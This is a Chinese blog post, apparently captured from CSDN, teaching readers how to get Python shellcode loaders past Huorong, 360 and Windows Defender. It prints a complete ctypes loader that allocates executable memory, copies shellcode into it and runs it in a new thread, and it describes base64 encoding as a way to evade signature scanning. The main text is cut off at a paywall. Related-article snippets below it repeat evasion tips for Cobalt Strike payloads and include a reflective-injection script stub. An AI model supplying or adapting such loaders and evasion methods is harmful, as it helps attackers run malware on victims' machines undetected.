Python免杀火绒、360和Defender

最新推荐文章于 2025-04-03 19:20:12 发布
最新推荐文章于 2025-04-03 19:20:12 发布
阅读量2.3w 收藏 45
点赞数 9
分类专栏: 渗透测试 文章标签: Python SC加载器 Python免杀 特征码绕过 360火绒Defender免杀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/108994177
版权

目录

简介

环境

原理

加载ShellCode

定位特征码 

Base64编码绕过

简介

之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过杀毒软件静态分析。虽然使用的方法比较简单,但对实际做免杀及免杀研究还是有一定意义的。

环境

  • Windows 10 x64
  • Python 3.8.3
  • Pyinstaller
  • 火绒版本:5.0.53.1,病毒库:2020-10-09
  • 360安全卫士:12.0.0.2003,备用木马库:2020-10-10
  • 360杀毒:5.0.0.8170

原理

杀毒软件的原理一般是匹配特征码,行为监测,虚拟机(沙箱),内存查杀等。360和火绒主要使用特征码检测查杀病毒(云查杀也是特征码检测),本文仅对360、火绒和Defender进行特征码检测绕过,因为Metasploit和CobaltStrike生成的shellcode中包含内存大小检测、网卡地址检测、编码、时区感知和获取系统信息等功能,但有时功能太多反而容易被检测,如图:

因此,本文通过使用base64编码混淆代码来绕过特征检测。

加载ShellCode

在C/C++语言中,通过申请内存将shellcode加载到内存中进行执行,在Python语言中通过ctypes模块将shellcode加载到内存并执行:

import ctypes

shellcode = b''
#调用kernel32.dll动态链接库中的VirtualAlloc函数申请内存,0x3000代表MEM_COMMIT | MEM_RESERVE,0x40代表可读可写可执行属性
wiseZERld = ctypes.windll.kernel32.VirtualAlloc(  
    ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),ctypes.c_int(0x40)
)
#调用kernel32.dll动态链接库中的RtlMoveMemory函数将shellcode移动到申请的内存中
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_int(wiseZERld),
    shellcode,
    ctypes.c_int(len(shellcode))
)
#创建线程并执行shellcode
CVXWRcjqxL = ctypes.windll.kernel32.CreateThread( 
    ctypes.c_int(0),#指向安全属性的指针
    ctypes.c_int(0),#初始堆栈大小
    ctypes.c_int(wiseZERld),#指向起始地址的指针
    ctypes.c_int(0),#指向任何参数的指针
    ctypes.c_int(0),#创建标志
    ctypes.pointer(ctypes.c_int(0)))#指向接收线程标识符的值的指针
ctypes.windll.kernel32.WaitForSingleObject(
    ctypes.c_int(CVXWRcjqxL),
    ctypes.c_int(-1)
)

定位特征码 

但上面的代码早已被提取特征码,杀毒软件会检测到,如图:

最低0.47元/天 解锁文章
cs-使用python进行
m0_53087192的博客
02-08 1990
环境 使用python版本为python3.6 32位版本,64位版本测试会报错。 安装pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 生成shellcode 使用cobalsstrike生成c语言shellcode。 使用shellcode loader加载shellcode #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x
红队培训班作业 | 360火绒 四种方法大对比
Ms08067安全实验室
08-16 3141
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
【渗透测试笔记】之【Python——两行代码。VT查率:10/68(思路:将ShellCodeLoader一起分离)】
AA8j的博客
10-24 6100
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查率:1
Cobalt Strike CS2 Beacon技术分析
最新发布
syg6921008的博客
04-03 1362
Cobalt Strike 2/4.x (CS2) 是当前红队演练APT模拟中最常用的控制框架。由于它的 Beacon payload 默认给出的可执行文件、加载器 shellcode 均已被大量毒软件加入特征并纵向检测,因此,Beacon 处理是正常使用的必须技术前缀。技术分为静态,动态,行为干扰,内存正常行为防护等方面,以下进行精细分类。利用 VirtualAlloc / VirtualProtect 创建可执行内存段自定义 shellcode 解密流程。
Python
土豆的博客
08-03 2549
Somethingu have to know: 本Python脚本构建简易的http请求及响应,可通过服务端调用客户端CMD执行命令(可在客户端内置便捷指令 )。 同时,脚本使用了PyInstaller,将python解释器及第三方模块进行打包成可执行文件。 经测试可绝大多数软。 0x01 环境准备 pip install requests(用于发送请求) pip install pyscreenshot...
python
weixin_43152809的博客
07-13 772
最近学习的过程中,发现python的匿名函数很适合用于python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
Python shellcode
qq_25761407的博客
04-02 5790
Python shellcode
绕过火绒Defender360安全软件的技术实现与代码示例
12-21
本文详细介绍了如何绕过火绒Defender360等安全软件的技术方法,这些方法包括静态绕过以及运行时行为检测的规避。 首先,绕过火绒360安全软件相对比较简单,多数情况下,只要静态绕过火绒就能正常上线。对于...
一款基于python的shellcode加载器+源代码+文档说明
12-01
- 2023-10-25:病毒库更新至最新的火绒360动态可过,windows defender静态可过 - 2023-11-02:evilhiding v1.1更新,能绕过火绒360defender -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行...
python3内存加载cs shellcode实现
None安全团队
12-03 2204
前言: 最近看到很多利用加载器来加载shellcode来实现的思路,前段时间本公众号还推了一个j0师傅的golang加载器,大家用了过后是不是感觉效果都不错?今天本文来利用python来作为加载器来实现的效果。 先说说效果: 经本地测试360全家桶+火绒。 当然的不止这些,其余的没有本地测试,放微步、vs、vt等平台上去跑了。 微步检出率(3/25) vs检出率(4/49) vt检出率(16/69) 从上述检测结果来看,国内主流的...
火绒
sash1mi
02-04 2435
火绒 接上篇文章《360全家桶》 https://blog.csdn.net/weixin_46676743/article/details/113350500 1.cs建立监听 2.生成payload 3.将生成的payload放到kali里编译 4.FourEye编译 项目地址与具体使用方法: https://github.com/lengjibo/FourEye 注意:一定要按照此工具的编译规则install gcc!! 5.火绒 360 6.cs上线 .
使用Python进行防病毒解析
09-18
主要介绍了使用Python进行防病毒,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
python制作软件教程及工具.zip
07-26
本资源会教你如何用python制作软件,并提供了所需的代码工具脚本,亲测能够过360安全卫士火绒
python学习
m0_58595840的博客
01-06 501
pythonbypass学习
Python常见的方式
m0_62207482的博客
02-09 1633
使用pyinstaller生成的可执行文件 本身就具有一定的能力,但是在与毒软件对抗时,部分毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
python 加密_python字符加密
weixin_39564755的博客
12-07 424
目前传统的或网上以公开的方式几乎都不了(见光死),所以本次方式也只是分享一下思路,如果后面不了再改改就可以了这里使用的是python加载shellcode,原始的shellcode加载源码如下:importctypesshellcode=b"这里是生成的shellcode"#设置函数VirtualAlloc的返回类型为c_int64ctypes.windll.kerne...
学习(二)python
m0_62207170的博客
01-09 673
python
python基础——三步(查、连接、代码)情况
渗透测试
11-14 2145
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程。调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;本次使用msf生成的shellcode。本次使用msf生成的shellcode。连接上次一样,秒连。
Python入门学习
Fighter安全
04-23 2601
这里主要针对国内主流三大软进行测试,python语法简单,开发效率高,适合入门学习,而且效果也还不错。当然是具有时效性的,文章的方法主要记录一下思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11毒软件:360毒(全引擎) + 火绒 + Windows Defender
cobaltstrike
02-26
### Cobalt Strike 技巧实现方法 #### 1. 使用 GobypassAV-shellcode 开源项目 GobypassAV-shellcode 是一个专注于 Cobot Strike 的技术的开源项目。此项目提供了一种有效的方法来避开主流毒软件(如火绒360系列、Defender)的查,从而实现更为隐蔽持久的网络渗透测试[^1]。 #### 2. 利用混淆技术编码器 为了使恶意代码难以被识别,可以采用多种混淆手段技术。例如,使用 Metasploit 中内置的各种编码器对 payload 进行加密处理,使得静态分析变得困难。此外,还可以通过修改 shellcode 结构或引入无害指令填充等方式增加复杂度,降低特征匹配的成功率[^2]。 #### 3. 动态加载与反射注入 动态加载是指在运行时解析并调用所需的 API 函数而不是直接硬编码路径;而反射注入则是指将自定义 DLL 注入到目标进程中执行而不依赖于文件系统上的副本。这两种方式都可以减少签名规则命中几率,并且让安全产品更难追踪行为模式。 #### 4. 配合在线沙盒环境测试效果 实际操作过程中建议配合使用线上沙箱服务来进行简单快速的效果验证。这有助于及时调整策略以适应不同厂商产品的更新变化趋势,确保最终生成的有效载荷能够在大多数环境中保持较低检出率的同时维持正常功能。 ```python from ctypes import * import sys def reflective_inject(dll_path, target_pid): # 反射注入的核心逻辑省略... pass if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python script.py <DLL_PATH> <TARGET_PID>") exit(1) dll_path = sys.argv[1] target_pid = int(sys.argv[2]) reflective_inject(dll_path, target_pid) ```
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值